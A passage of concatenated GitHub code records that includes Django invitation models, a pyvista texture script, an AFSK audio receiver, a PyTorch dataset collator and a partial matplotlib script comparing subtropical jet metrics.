rt.append(matrix[row][l])\n l += 1\n if l > r:\n break\n return rt\n","repo_name":"suafeng/BaldmanBolder","sub_path":"54_spiral_matrix.py","file_name":"54_spiral_matrix.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"22767562918","text":"from random import random\n\nfrom hashlib import sha1 as sha_constructor\n\nimport django\n\nfrom django.db import models\nfrom django.db.models import signals\nfrom django.core.validators import validate_email\nfrom django.core.exceptions import ValidationError\nfrom django.conf import settings\n\nfrom social.apps.django_app.default.fields import JSONField\nfrom social.apps.django_app.default.models import UID_LENGTH, UserSocialAuth\n\nfrom .signals import relation_linked, relation_joined\n\n\nclass RelationManager(models.Manager):\n def contribute_to_class(self, cls, name):\n signals.post_save.connect(self.post_save, sender=cls)\n\n super(RelationManager, self).contribute_to_class(cls, name)\n\n def post_save(self, instance, *args, **kwargs):\n if kwargs.get('created', False) and instance.to_user_id:\n relation_linked.send(sender=instance.__class__,\n instance=instance,\n user=instance.to_user)\n\n\nclass Relation(models.Model):\n name = models.CharField(max_length=255, null=True, blank=True)\n from_user = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='relations_sent')\n to_user = models.ForeignKey(settings.AUTH_USER_MODEL,\n related_name='relations_received',\n null=True,\n blank=True)\n provider = models.CharField(max_length=32, db_index=True)\n uid = models.CharField(max_length=UID_LENGTH, db_index=True)\n extra_data = JSONField()\n\n objects = RelationManager()\n\n class Meta:\n \"\"\"Meta data\"\"\"\n unique_together = ('from_user', 'provider', 'uid')\n db_table = 'fairepart_relation'\n\n def is_uid_email(self):\n try:\n validate_email(self.uid)\n except ValidationError:\n return False\n else:\n return True\n\n\nclass Invitation(models.Model):\n from_user = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='invitations_sent')\n to_user = models.ForeignKey(settings.AUTH_USER_MODEL,\n related_name='invitations_received',\n null=True,\n blank=True)\n email = models.EmailField()\n text = models.TextField(blank=True, null=True)\n token = models.CharField(max_length=40)\n\n class Meta:\n db_table = 'fairepart_invitation'\n\n def save(self, *args, **kwargs):\n if not self.token:\n salt = sha_constructor(str(random())).hexdigest()[:5]\n\n self.token = sha_constructor(salt + self.email).hexdigest()\n\n return super(Invitation, self).save(*args, **kwargs)\n\n\ndef handle_user(sender, instance, *args, **kwargs):\n if kwargs.get('created', False) and instance.email:\n relations = Relation.objects.filter(uid=instance.email, to_user__isnull=True)\n\n for relation in relations:\n relation.to_user = instance\n\n relation_joined.send(sender=Relation,\n instance=relation,\n user=instance)\n\n relations.update(to_user=instance)\n\n\ndef handle_user_social_auth(sender, instance, *args, **kwargs):\n if kwargs.get('created', False) and instance.uid:\n relations = Relation.objects.filter(uid=instance.uid, to_user__isnull=True)\n\n for relation in relations:\n relation.to_user = instance.user\n\n relation_joined.send(sender=Relation,\n instance=relation,\n user=instance.user)\n\n relations.update(to_user=instance.user)\n\n\nsignals.post_save.connect(handle_user_social_auth, sender=UserSocialAuth)\n\nif django.VERSION < (1, 7):\n from .compat import User\n\n signals.post_save.connect(handle_user, sender=User)\nelse:\n from django.apps import apps\n\n if apps.ready:\n from .compat import User\n\n signals.post_save.connect(handle_user, sender=User)\n","repo_name":"thoas/django-fairepart","sub_path":"fairepart/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3983,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"} +{"seq_id":"5708416910","text":"import numpy as np\nimport pandas as pd\nimport pyvista as pv\nfrom pyvista import examples\n\n# shirts_path = './models/shirts/shirts_simple.obj'\n# img_file = './models/shirts/up_dog.jpg'\nshirts_path = './models/Artec3D/Pasha_guard_head.obj'\nimg_file = './models/Artec3D/Pasha_guard_head_0.png'\n\ntex = pv.read_texture(img_file)\n\n# Manually parse the OBJ file because meshio complains\nraw_data = pd.read_csv(shirts_path, header=None, comment=\"#\",\n delim_whitespace=True, names=[\"type\", \"a\", \"b\", \"c\"])\ngroups = raw_data.groupby(\"type\")\n# from IPython.core.debugger import Pdb; Pdb().set_trace()\nv = groups.get_group(\"v\")\nf = groups.get_group(\"f\")\nvt = groups.get_group(\"vt\")[[\"a\", \"b\"]].values.astype(float)\nvertices = v[[\"a\", \"b\", \"c\"]].astype(float).values\n# fa = np.array([(int(x[0]), int(x[1]), int(x[2])) for x in f[\"a\"].str.split(\"/\")])\n# fb = np.array([(int(x[0]), int(x[1]), int(x[2])) for x in f[\"b\"].str.split(\"/\")])\n# fc = np.array([(int(x[0]), int(x[1]), int(x[2])) for x in f[\"c\"].str.split(\"/\")])\nfa = np.array([(int(x[0]), int(x[1])) for x in f[\"a\"].str.split(\"/\")])\nfb = np.array([(int(x[0]), int(x[1])) for x in f[\"b\"].str.split(\"/\")])\nfc = np.array([(int(x[0]), int(x[1])) for x in f[\"c\"].str.split(\"/\")])\nfaces = np.c_[fa[:,0], fb[:,0], fc[:,0]] - 1 # subtract 1\n#### End manual parsing\n\n# Create the mesh\ncells = np.c_[np.full(len(faces), 3), faces]\nmesh = pv.PolyData(vertices, cells)\n\n# Generate the tcoords on the faces\nctcoords = np.c_[fa[:,1], fb[:,1], fc[:,1]] - 1 # subtract 1\nui, vi = ctcoords[:,0], ctcoords[:,1]\ncuv = np.c_[vt[:,0][ui], vt[:,1][vi]]\nmesh.cell_arrays[\"Texture Coordinates\"] = cuv\n\n# Interpolate the cell-based tcoords to the points\nremesh = mesh.cell_data_to_point_data()\n# Register the array as texture coords\nremesh.t_coords = remesh.point_arrays[\"Texture Coordinates\"]\n\n# Plot it up, yo!\nremesh.plot(texture=tex)\n\n# model_path = './models/Artec3D/Pasha_guard_head.obj'\n# texture_path = './models/Artec3D/Pasha_guard_head_0.png'\n# plt = pv.Plotter()\n# mesh = pv.read(model_path)\n# tex = pv.read_texture(texture_path)\n# # plt.add_mesh(mesh, texture=tex)\n# plt.add_mesh(mesh)\n# plt.set_background((19/255, 19/255, 36/255), (130/255, 134/255, 243/255))\n# plt.show(cpos=\"xy\")\n","repo_name":"DXCn7wNe/python-snippet","sub_path":"pyvista_test.py","file_name":"pyvista_test.py","file_ext":"py","file_size_in_byte":2218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"33220510273","text":"from json import load\r\nfrom abc import ABC, abstractmethod\r\nfrom typing import Union\r\n\r\n\r\nclass Extractor(ABC):\r\n def __init__(self, path_doc: str, cfg=None) -> None:\r\n self.__cfg: Union[dict, None] = cfg\r\n\r\n with open(path_doc, 'r', encoding='UTF-8') as file:\r\n self.__json_file: list = load(file)\r\n\r\n @staticmethod\r\n def __format_tuple(raw_tuple: tuple[int]) -> tuple[int]:\r\n if len(raw_tuple) == 2:\r\n raw_tuple += (1,)\r\n elif len(raw_tuple) == 1:\r\n raw_tuple: tuple[int, None, int] = (-raw_tuple[0], None, 1)\r\n\r\n return raw_tuple\r\n\r\n @abstractmethod\r\n def extract_events(self, range_events: tuple[int]):\r\n self.__formatted_tuple: tuple[int] = self.__format_tuple(range_events)\r\n\r\n @property\r\n def json_file(self) -> list:\r\n return self.__json_file\r\n\r\n @property\r\n def cfg(self) -> Union[dict, None]:\r\n return self.__cfg\r\n\r\n @property\r\n def formatted_tuple(self) -> tuple[int]:\r\n return self.__formatted_tuple\r\n\r\n\r\nclass ExtractorFromSite(Extractor):\r\n def extract_events(self, range_events: tuple[int]) -> list[dict]:\r\n super().extract_events(range_events)\r\n return self.json_file[self.formatted_tuple[0]:self.formatted_tuple[1]:self.formatted_tuple[2]]\r\n\r\n\r\nclass ExtractorFromPublic(Extractor):\r\n def extract_events(self, range_events: tuple[int]) -> list[str]:\r\n super().extract_events(range_events)\r\n\r\n post_list: list[str] = []\r\n for public in self.cfg['public']:\r\n for post in self.json_file[public]:\r\n post_list.append(post['text'])\r\n\r\n return post_list\r\n\r\n\r\n# Тест!\r\nextractor_from_site = ExtractorFromSite('data/Event_List_10_09_2022_17_38_.json')\r\ncfg = {'public': (\"afisha.almet\",)}\r\nextractor_from_public = ExtractorFromPublic('data/Posts_List_10_09_2022_18_55_.json', cfg)\r\na = extractor_from_site.extract_events((5,))\r\nb = extractor_from_public.extract_events((5,))\r\nprint(b)","repo_name":"Damir-prg/parser-non-async","sub_path":"extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4280441079","text":"import numpy as np\r\nimport scipy.signal as sp\r\n\r\nfrom afsk import AFSK\r\n\r\n\r\nclass Filter:\r\n # generic class to implement the transfer function H(z) = B(z)/A(z)\r\n # the filter also computes the output power via a leaky integrator\r\n def __init__(self, b, a, leak=0.95):\r\n assert len(a) == len(b), 'must have same number of coefficients in a and b -- zero pad if necessary'\r\n self.a = a\r\n self.b = b\r\n self.N = len(a)\r\n self.y = [0] * self.N\r\n self.x = [0] * self.N\r\n self.ix = 0\r\n self.value = 0\r\n self.leak = leak\r\n self.power = 0\r\n\r\n def compute(self, x):\r\n self.x[self.ix] = x\r\n self.value = self.b[0] * x\r\n for n in range(1, self.N):\r\n k = (self.ix + self.N - n) % self.N\r\n self.value += self.b[n] * self.x[k] - self.a[n] * self.y[k]\r\n self.y[self.ix] = self.value\r\n self.ix = (self.ix + 1) % self.N\r\n self.power = self.leak * self.power + (1 - self.leak) * self.value * self.value\r\n return self.value\r\n\r\n\r\nclass EllipticBandpass(Filter):\r\n def __init__(self, order, center, bw, Fs, ripple=2.5, att=50, leak=0.95):\r\n W = np.array([center - bw / 2, center + bw / 2]) / (Fs / 2)\r\n super().__init__(*sp.ellip(order, ripple, att, W, btype='bandpass'), leak=leak)\r\n\r\n\r\nclass Notch:\r\n # simple complex-zero-pair notch filter used for phase reversal detection\r\n def __init__(self, center, Fs):\r\n self.c = -2 * np.cos(2 * np.pi * center / Fs)\r\n self.x1 = 0\r\n self.x2 = 0\r\n self.value = 0\r\n\r\n def compute(self, x):\r\n self.value = x + self.c * self.x1 + self.x2\r\n self.x2 = self.x1\r\n self.x1 = x\r\n return self.value\r\n\r\n\r\nclass AGC:\r\n # automatic gain control circuit\r\n def __init__(self, target, alpha=0.01):\r\n self.max_gain = 100\r\n self.target = target\r\n self.alpha = alpha\r\n self.gain = 1\r\n\r\n def set_speed(self, alpha):\r\n self.alpha = alpha\r\n\r\n def update(self, x):\r\n self.gain += self.alpha * (self.target - abs(x))\r\n if self.gain > self.max_gain:\r\n self.gain = self.max_gain\r\n\r\n\r\nclass Receiver(AFSK):\r\n # Simple incoherent AFSK receiver. No timing recovery is implemented so keep the bitrate low\r\n # Correct detection hinges on proper synchronization with the timing reference in the preamble\r\n # so if you have burst noise during pilot time, tough luck.\r\n\r\n # state machine\r\n WAIT_PILOT = 0\r\n WAIT_SYNC = 10\r\n WAIT_DATA = 30\r\n ONLINE = 40\r\n\r\n def __init__(self):\r\n # received operates at a fixed rate of 32KHz\r\n self.Fs = 32000\r\n # samples per bit\r\n self.spb = self.Fs / self.BPS\r\n\r\n # leaky integrator to compute signal power\r\n self.signal = Filter([1], [1], leak=0.995)\r\n\r\n # Automatic Gain Control\r\n self.agc_speed = {\r\n 'fast': 0.005,\r\n 'slow': 0.001,\r\n }\r\n self.agc = AGC(1, self.agc_speed['fast'])\r\n self.agc_wait_len = int(self.Fs * 0.3)\r\n\r\n # pilot and timing\r\n self.timing_detector = Notch(self.PILOT_FREQ, self.Fs)\r\n self.reference_power = 0\r\n self.timing_threshold = -2\r\n self.timing_reference = [self.timing_threshold, -1] # threshold, time\r\n\r\n # bandpass filters for PILOT, MARK and SPACE\r\n self.pilot = EllipticBandpass(3, self.PILOT_FREQ, 700, self.Fs, leak=0.99)\r\n self.mark = EllipticBandpass(3, self.MARK_FREQ, 900, self.Fs)\r\n self.space = EllipticBandpass(3, self.SPACE_FREQ, 900, self.Fs)\r\n\r\n # collect incoming bits into bytes\r\n self.decision = 0\r\n self.octet = ''\r\n\r\n # state machine\r\n self.state = self.WAIT_PILOT\r\n self.timer = self.agc_wait_len\r\n self.ix = 0\r\n\r\n def restart(self):\r\n # call this after data is lost to reset the receiver\r\n self.agc.set_speed(self.agc_speed['fast'])\r\n self.signal.power = 0\r\n self.pilot.power = 0\r\n self.timing_reference = self.timing_reference = [self.timing_threshold, -1]\r\n self.decision = 0\r\n self.octet = ''\r\n self.state = self.WAIT_PILOT\r\n self.timer = self.agc_wait_len\r\n self.ix = 0\r\n\r\n def receive(self, x):\r\n # automatic gain control\r\n x *= self.agc.gain\r\n self.agc.update(x)\r\n self.signal.compute(x)\r\n\r\n # run all filters\r\n self.pilot.compute(x)\r\n self.mark.compute(x)\r\n self.space.compute(x)\r\n\r\n if self.state == self.WAIT_PILOT:\r\n self.ix = 0\r\n # wait until the power in the pilot band is more than a quarter of total power\r\n if self.pilot.power > 0.25 * self.signal.power:\r\n # start priming the timing detector\r\n self.timing_detector.compute(x)\r\n self.timer -= 1\r\n if self.timer <= 0:\r\n # wait until AGC stabilizes and then move on to synch detection\r\n self.reference_power = 0.25 * self.pilot.power\r\n self.state = self.WAIT_SYNC\r\n print(f'pilot detected ({self.ix})')\r\n else:\r\n self.timer = self.agc_wait_len\r\n\r\n elif self.state == self.WAIT_SYNC:\r\n # detect phase reversal and track location of minimum. The idea is that if you have a 180-degree\r\n # phase jump, the notch filter's output will shoot down to large negative values. Of course for\r\n # this to work you need the signal to be a true sinusoidal pilot.\r\n # This is the most fragile step in the detector\r\n self.timing_detector.compute(x)\r\n if self.timing_detector.value < self.timing_reference[0]:\r\n self.timing_reference = [self.timing_detector.value, self.ix]\r\n # turn off AGC once we detect a sync pulse\r\n self.agc.set_speed(0)\r\n print(f'timing reference: {self.timing_reference}')\r\n if self.pilot.power < self.reference_power:\r\n if self.timing_reference[1] > 0:\r\n # sync was detected; number of samples before data starts:\r\n self.timer = int((self.PILOT_TAIL + self.GAP_LEN) * self.Fs) - (self.ix - self.timing_reference[1])\r\n self.state = self.WAIT_DATA\r\n print(f'pilot end detected at {self.ix}')\r\n else:\r\n print(f'pilot lost')\r\n self.restart()\r\n\r\n elif self.state == self.WAIT_DATA:\r\n # wait until data starts\r\n self.timer -= 1\r\n if self.timer <= 0:\r\n # resume AGC\r\n self.agc.set_speed(self.agc_speed['slow'])\r\n self.timer = self.spb\r\n self.state = self.ONLINE\r\n print(f'data starts ({self.ix})\\n')\r\n\r\n elif self.state == self.ONLINE:\r\n # accumulate power from bandpass filters and decide on bit value at the end of the symbol period\r\n # the PC microphone seems to have an unstable characteristic, so we may need to boost\r\n # one of the filters a bit (not done here)\r\n self.decision += abs(self.mark.value)\r\n self.decision -= abs(self.space.value)\r\n self.timer -= 1\r\n if self.timer <= 0:\r\n self.octet += '1' if (self.decision > 0) else '0'\r\n if len(self.octet) == 8:\r\n print(chr(int(self.octet, 2)), end='', flush=True)\r\n self.octet = ''\r\n self.decision = 0\r\n self.timer += self.spb\r\n if self.signal.power < self.reference_power:\r\n self.restart()\r\n print(f'\\n\\ndata signal lost, waiting for new pilot tone')\r\n\r\n self.ix += 1\r\n\r\n\r\nif __name__ == '__main__':\r\n import pyaudio\r\n import time\r\n\r\n # instantiate the receiver\r\n receiver = Receiver()\r\n\r\n # set up pyaudio for real-time processing\r\n def callback(in_data, frame_count, time_info, status):\r\n for x in np.frombuffer(in_data, dtype=np.int16):\r\n receiver.receive(x / 32767.0)\r\n return None, pyaudio.paContinue\r\n\r\n audio_io = pyaudio.PyAudio()\r\n info = audio_io.get_host_api_info_by_index(0)\r\n numdevices = info.get('deviceCount')\r\n for i in range(0, numdevices):\r\n if (audio_io.get_device_info_by_host_api_device_index(0, i).get('maxInputChannels')) > 0:\r\n print(\"Input Device id \", i, \" - \", audio_io.get_device_info_by_host_api_device_index(0, i).get('name'))\r\n\r\n stream = audio_io.open(\r\n input_device_index=-1,\r\n format=audio_io.get_format_from_width(2), # 16 bits per sample\r\n channels=1, # mono input\r\n rate=receiver.Fs,\r\n input=True,\r\n output=False,\r\n frames_per_buffer=1024,\r\n stream_callback=callback)\r\n\r\n stream.start_stream()\r\n while stream.is_active():\r\n time.sleep(1)\r\n stream.stop_stream()\r\n stream.close()\r\n audio_io.terminate()\r\n","repo_name":"bybel/SignalShits","sub_path":"dspdemos/receiver.py","file_name":"receiver.py","file_ext":"py","file_size_in_byte":9248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"34586239317","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jul 13 08:18:31 2021\r\n\r\n@author: 亚亚\r\n\"\"\"\r\nimport pandas as pd\r\nimport numpy as np\r\n#load the behaviorial directory\r\nsim_path = \"D:/hcpd/hcpd_simplified/behavior_simplified_dictionary.xlsx\"\r\n\r\ndf = pd.read_excel(sim_path)\r\nfor ind, row in df.iterrows():\r\n element = row[2].split(',')\r\n for i in ['version_form', 'comqother']:\r\n if i in element:\r\n df.iloc[ind,1] = row[1]+i\r\n element.remove(i)\r\n df.iloc[ind,2] = ','.join(element)\r\ndf.to_excel(\"D:/hcpd/hcpd_simplified/behavior_simplified_dictionary.xlsx\",index=False)\r\n \r\n \r\n\r\n ","repo_name":"Meanda/hcp-behavior","sub_path":"demo_subtable.py","file_name":"demo_subtable.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"41173761391","text":"vals= [2, 3, 2, 4, 4, 5, 1, 6, 6, 1, 4, 7, 6, 4, 5, 6, 5, 5, 1, 6]\n# first: sort the list\nvals.sort()\n\n# second: create two new array\n# one as a set of the elements in the array\n# the other as a list of the corresponding frequency\nn = 0\nfirst_index = 0\nlast_index = first_index\nfreq_list = []\nelement_list = []\nwhile last_index < len(vals):\n if vals[first_index] == vals[last_index]:\n last_index = last_index + 1\n n = n + 1\n else:\n element_list.append(vals[first_index])\n first_index = last_index\n freq_list.append(n)\n n = 0\n\nelement_list.append(vals[first_index])\nfreq_list.append(n)\nprint(\"element list = \" + str(element_list))\nprint(\"frequency list = \" + str(freq_list))\n\n# create an intermediate list sorting the frequency of the elements\n# this is where the sorting occurs\nintermediate_list = freq_list.copy()\nintermediate_list.sort(reverse = True)\nprint(\"intermediate list = \" + str(intermediate_list))\n\n# find the index of the elements in the intermediate list in the frequency list\nfinal_list = []\nfor i in intermediate_list:\n item_index = freq_list.index(i)\n item = element_list[item_index]\n item_list = []\n item_list.append(item)\n # print the item based on its frequency of occurence\n final_list.extend(item_list * i)\n #remove the items already listed\n freq_list.remove(i)\n element_list.remove(element_list[item_index])\n\nprint(\"final list = \" + str(final_list))\n\n\n","repo_name":"monsur4/sorting-a-list-of-integers","sub_path":"sorter.py","file_name":"sorter.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"32271690598","text":"from torch.utils.data import Dataset, DataLoader\nimport torch\n\nclass GPTDataset(Dataset):\n def __init__(self, seq_pairs, tokenizer, special_tokens_dict, pad_idx):\n self.seq_pairs = seq_pairs\n self.tokenizer = tokenizer\n self.special_tokens_dict = special_tokens_dict\n self.pad_idx = pad_idx\n \n def __len__(self):\n return len(self.seq_pairs)\n\n def __getitem__(self, index):\n return self.seq_pairs[index]\n\n def collate_batch(self, datasets):\n tokens_list, labels_list, attention_mask_list = [], [], []\n\n for dataset in datasets:\n encoded_seq = self.tokenizer(dataset) # 假设 tokenizer 是一个合法的方法\n indexed_tks = encoded_seq[\"input_ids\"]\n attention_mask = encoded_seq[\"attention_mask\"]\n\n tokens_list.append(torch.tensor(indexed_tks))\n labels_list.append(torch.tensor(indexed_tks))\n attention_mask_list.append(torch.tensor(attention_mask))\n\n return self.pad_sequence(tokens_list, labels_list, attention_mask_list) # 请注意,这里需要补充 pad_sequence 方法的定义\n \n def pad_sequence(self, non_pad_token, non_pad_label, non_pad_attn):\n max_size = max([len(ele) for ele in non_pad_token]) # 找出该批次数据中的最长序列的长度\n pad_batch1 = torch.stack([torch.cat([t, torch.LongTensor([self.pad_idx] * (max_size - len(t)))]) for t in non_pad_token])\n pad_batch2 = torch.stack([torch.cat([t, torch.LongTensor([self.pad_idx] * (max_size - len(t)))]) for t in non_pad_label])\n pad_batch3 = torch.stack([torch.cat([t, torch.LongTensor([self.pad_idx] * (max_size - len(t)))]) for t in non_pad_attn])\n return pad_batch1, pad_batch2, pad_batch3","repo_name":"henry3556108/codalab_contest","sub_path":"data_set.py","file_name":"data_set.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"22688673284","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"Compare two STJ metrics. Plot limited timeseries and a map.\"\"\"\nimport os\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport xarray as xr\nimport numpy as np\nimport seaborn as sns\nimport STJ_PV.compare_two_runs as c2r\nfrom mpl_toolkits import basemap as bmp\nimport STJ_PV.run_stj as run_stj\n\nfrom pandas.plotting import register_matplotlib_converters\nregister_matplotlib_converters()\n__author__ = 'Michael Kelleher'\n\nHEM_LIMS = {'nh': [13, 54], 'sh': [-54, -13]}\nINFO = {'ERAI-DB':\n {'file': ('ERAI_PRES_DavisBirner_zmean_1979-01-01_2018-12-31.nc'),\n 'label': 'Davis-Birner'},\n\n 'ERAI-Uwind':\n {'file': ('ERAI_PRES_STJUMax_pres25000.0_y010.0_yN65.0_zmean_'\n '1979-01-01_2018-12-31.nc'), 'label': 'U Max'}}\n\n\ndef draw_map_lines(pmap, axis):\n \"\"\"\n Draw lat/lon and coast lines on a Basemap.\n\n Parameters\n ----------\n pmap : :class:`mpl_toolkits.basemap.Basemap`\n A `Basemap` onto which lines will be drawn\n axis : :class:`matplotlib.axes.Axes`\n Axis reference for `pmap`\n\n Returns\n -------\n None\n\n \"\"\"\n lat_spc = 15\n lon_spc = 60\n line_props = {'ax': axis, 'linewidth': 0.2, 'dashes': [4, 10],\n 'color': '#555555'}\n pmap.drawparallels(np.arange(-90, 90 + lat_spc, lat_spc), **line_props)\n pmap.drawmeridians(np.arange(0, 360 + lon_spc, lon_spc), **line_props)\n pmap.drawparallels(np.arange(-90, 90 + lat_spc * 2, lat_spc * 2),\n labels=[True, False, False, False], **line_props)\n pmap.drawcoastlines(linewidth=0.1, color='#333333', ax=axis)\n circle = pmap.drawmapboundary(linewidth=2, color='white', ax=axis,\n zorder=6, fill_color='none')\n circle.set_clip_on(False)\n\n\ndef get_pvgrad_pos(date):\n \"\"\"\n Get STJ position at all longitudes for PVGrad method.\n\n Parameters\n ----------\n date : :class:`datetime.datetime`\n Selected date to compute STJ metric\n\n Returns\n -------\n jet_lat : :class:`numpy.ndarray`\n An array of jet latitude locations (hemisphere, time, lon)\n\n \"\"\"\n # jf_run = run_stj.JetFindRun('./conf/stj_config_erai_theta.yml')\n jf_run = run_stj.JetFindRun(\n './conf/stj_config_erai_monthly_davisbirner_gv.yml'\n )\n # Force update_pv and force_write to be False,\n # optional override of zonal-mean\n jf_run.config['update_pv'] = False\n jf_run.config['force_write'] = False\n jf_run.config['zonal_opt'] = 'mean'\n jet = jf_run.run(date_s=date, date_e=date + pd.Timedelta(days=34),\n save=False)\n try:\n # Remove log file created by JF_RUN, comment\n # this out if there's a problem\n os.remove(jf_run.config['log_file'])\n except OSError:\n print('Log file not found: {}'.format(jf_run.config['log_file']))\n\n return [jet.out_data['lat_{}'.format(hem)] for hem in ['sh', 'nh']]\n\n\ndef plot_annotations(fig, axes, cfill):\n \"\"\"Annotate the map and line plots.\n \"\"\"\n grid_style = {'b': True, 'ls': '-', 'color': 'lightgrey', 'lw': 0.2}\n axes[0, 0].legend(ncol=2, fontsize=plt.rcParams['font.size'])\n axes[0, 0].tick_params(bottom=False, labelbottom=False)\n for idx in range(axes.shape[0]):\n\n # Remove borders from timeseries plot\n sns.despine(ax=axes[idx, 0], left=False, bottom=idx == 0, offset=4)\n # Set the lineplot grid to have `grid_style`\n axes[idx, 0].grid(**grid_style)\n # Rotate y-axis ticks so SH/NH have same\n axes[idx, 0].tick_params(axis='y', rotation=90)\n\n # Add colorbar axis\n cax = fig.add_axes([0.5375, 0.035, 0.45, 0.015])\n cbar = fig.colorbar(cfill, cax=cax, orientation='horizontal')\n # cbar.ax.yaxis.set_ticks_position('right')\n # cbar.ax.yaxis.set_label_position('right')\n\n # Remove border from colorbar\n cbar.outline.set_color('none')\n\n fig.subplots_adjust(left=0.07, bottom=0.05,\n right=0.99, top=0.98,\n wspace=0.03, hspace=0.03)\n\n\ndef plot_labels(fig, figscale):\n \"\"\"Put a, b, c, ... on plots.\"\"\"\n labels = {'a': {'x': 0.07, 'y': 0.9}, 'b': {'x': 0.07, 'y': 0.45},\n 'c': {'x': 0.56, 'y': 0.9}, 'd': {'x': 0.56, 'y': 0.45}}\n\n for label in labels:\n fig.text(**labels[label], s=f'({label})', fontsize=figscale * 9.0)\n\n\ndef main(width=174, figscale=1.0, extn='png'):\n \"\"\"Load data, make plots.\"\"\"\n # Parameters, labels, etc.\n in_names = ['ERAI-DB', 'ERAI-Uwind']\n labels = [INFO[name]['label'] for name in in_names]\n\n dates = {'nh': pd.Timestamp('2018-05-01'),\n 'sh': pd.Timestamp('2017-03-01')}\n\n nc_dir = './jet_out'\n wind_dir = '/Volumes/data/erai/monthly/'\n theta_lev = 300\n\n # Set the font to sans-serif and size 9 (but scaled)\n plt.rc('font', family='sans-serif', size=9 * figscale)\n # Adjust the title padding to bring it closer\n # this won't work under axis.set_title???\n plt.rc('axes', titlepad=-5.0)\n\n # Assign colors to labels so lines on timeseries and map are the same color\n cols = {labels[0]: '#0D1317', labels[1]: '#5755BA'}\n\n # Set contour levels for map,\n u_contours = np.arange(-45, 50, 5)\n # Load file diags using compare_two_runs.FileDiag and append two metrics\n fds = [c2r.FileDiag(INFO[in_name], file_path=nc_dir)\n for in_name in in_names]\n data = fds[0].append_metric(fds[1])\n\n # Make timeseries plot for each hemisphere, and map for selected date\n # Scale the figure size\n fig_w, fig_h = (figscale * width / 25.4, figscale * width / 25.4)\n\n # Make a 2 x 2 subplot\n fig, axes = plt.subplots(2, 2, figsize=(fig_w, fig_h))\n for idx, dfh in enumerate(data.groupby('hem')):\n # Hemisphere key-name\n hem = dfh[0]\n\n # Plot timeseries for each method\n for kind, dfk in dfh[1].groupby('kind'):\n axes[idx, 0].plot(dfk.lat, label=kind, color=cols[kind], lw=2.0)\n sct_opts = {'edgecolor': cols[kind], 'facecolor': 'white',\n 'marker': 'o', 'zorder': 5}\n\n axes[idx, 0].scatter(dfk[dfk.time == dates[hem]].time.values,\n dfk[dfk.time == dates[hem]].lat.values,\n **sct_opts)\n\n # Label the timeseries\n axes[idx, 0].set_ylabel(c2r.HEMS[hem])\n\n # Restrict to 2010-2016\n axes[idx, 0].set_xlim([pd.Timestamp('2012-01-01'),\n pd.Timestamp('2018-12-31')])\n\n # Show which date is being plotted in the map with a verical line\n axes[idx, 0].axvline(dates[hem], color='k', ls='--', lw=1.1, zorder=0)\n\n # left-ward extent, limit the y-axis\n axes[idx, 0].set_ylim(HEM_LIMS[hem])\n\n # Open ERAI data to extract zonal wind\n dsw = xr.open_dataset(f'{wind_dir}/erai_pres_{dates[hem].year}.nc')\n\n # Select the correct day and level from the u-wind\n uwnd = dsw.sel(time=dates[hem], level=theta_lev).u\n\n # Get latitude and add cyclic point from longitude\n lat = uwnd.latitude.values\n uwnd, lon = bmp.addcyclic(uwnd.values, uwnd.longitude.values)\n\n # Generate a {s/n}pstere Basemap\n pmap = bmp.Basemap(projection=f'{hem[0]}pstere',\n lon_0=0, boundinglat=0,\n resolution='c', round=True)\n\n map_x, map_y = pmap(*np.meshgrid(lon, lat))\n cfill = pmap.contourf(map_x, map_y, uwnd, u_contours,\n cmap='RdBu_r', ax=axes[idx, 1], extend='both')\n\n # Extract the kind for the zonal mean of the first kind (labels[0])\n _umax = dfh[1][dfh[1].kind == labels[1]]\n\n # Draw the parallel (latitude line) for this zonal mean jet location\n # the `latmax` parameter is needed (set to the same latitude) so that\n # the 80deg (N/S) is not drawn as well as the desired jet location\n pmap.drawparallels(_umax[_umax.time == dates[hem]].lat,\n linewidth=2.4, color=cols[labels[1]],\n ax=axes[idx, 1], dashes=[1, 0],\n latmax=_umax[_umax.time == dates[hem]].lat[0])\n\n # Create and run an stj_metric.STJPVMetric, don't save,\n # just return lat position\n pv_grad_lat = get_pvgrad_pos(dates[hem])\n\n # Indicies in this array are opposite to this loop's `idx`\n if hem == 'sh':\n hem_idx = 0\n else:\n hem_idx = 1\n\n # Transform the longitude and latitude points of the identified jet\n # to map coords then plot it on pmap\n if pv_grad_lat[hem_idx].ndim != 1:\n pvgrad_map = pmap(lon[:-1:2], pv_grad_lat[hem_idx][0, ::2].values)\n pmap.plot(*pvgrad_map, 'o', color=cols[labels[0]],\n ms=0.9, ax=axes[idx, 1])\n\n _pvgrad = dfh[1][dfh[1].kind == labels[0]]\n pmap.drawparallels(_pvgrad[_pvgrad.time == dates[hem]].lat,\n linewidth=2.4, color=cols[labels[0]],\n ax=axes[idx, 1], dashes=[1, 0],\n latmax=_pvgrad[_pvgrad.time == dates[hem]].lat[0],\n zorder=6)\n\n # Label the map with the selected date, align the title to\n # the right, the padding is set by plt.rcParams['axes.titlepad'],\n # rather than hlightgreyere, for some reason\n axes[idx, 1].set_title(dates[hem].strftime('%b %Y'), loc='right')\n draw_map_lines(pmap, axes[idx, 1])\n\n plot_annotations(fig, axes, cfill)\n plot_labels(fig, figscale)\n 